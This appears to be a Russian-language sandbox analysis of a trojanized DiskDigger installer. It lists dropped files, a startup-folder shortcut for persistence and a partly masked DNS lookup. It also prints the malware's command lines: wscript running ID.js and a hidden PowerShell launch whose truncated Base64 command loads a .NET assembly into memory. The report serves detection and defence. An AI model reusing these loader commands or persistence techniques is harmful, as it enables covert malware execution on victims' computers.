Техническая информация
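- %APPDATA%\microsoft\windows\start menu\programs\startup\chromium.ini.lnk (ярлык в папке автозагрузки пользователя: запускается при каждом входе в систему и служит для закрепления; цель ярлыка на странице не указана)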
- %APPDATA%\diskdigger 1.23.31.2917.exe
- %APPDATA%\id.js
- %TEMP%\is-8oahq.tmp\diskdigger 1.23.31.2917.tmp
- %TEMP%\is-0eb7q.tmp\_isetup\_regdll.tmp
- %TEMP%\is-0eb7q.tmp\_isetup\_setup64.tmp
- %TEMP%\is-0eb7q.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-0eb7q.tmp\istask.dll
- %TEMP%\is-0eb7q.tmp\vclstylesinno.dll
- %TEMP%\is-0eb7q.tmp\metroblue.vsf
- %TEMP%\is-0eb7q.tmp\wizardform.bitmapimage1.bmp
- %HOMEPATH%\appdata\chromium.js
- DNS ASK si##j.space
- ClassName: 'Edit' WindowName: ''
- '%APPDATA%\diskdigger 1.23.31.2917.exe'
- '%TEMP%\is-8oahq.tmp\diskdigger 1.23.31.2917.tmp' /SL5="$90216,2005661,64512,%APPDATA%\DiskDigger 1.23.31.2917.exe"
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\ID.js"
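- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (со скрытым окном)
  Примечание: параметр -e передаёт PowerShell команду в кодировке Base64 (UTF-16LE). Видимая часть строки декодируется как «  sleep 8; [AppDomain]::CurrentDomain.Load([Convert]::Frombase64Stri…»: после паузы в 8 секунд в процесс PowerShell загружается .NET-сборка из массива байтов, полученного декодированием Base64. Остальная часть команды на странице обрезана, поэтому источник этой строки и содержимое сборки отсюда не видны. При включённом журналировании блоков сценариев PowerShell (событие 4104) в журнал попадает уже декодированный текст команды.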
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...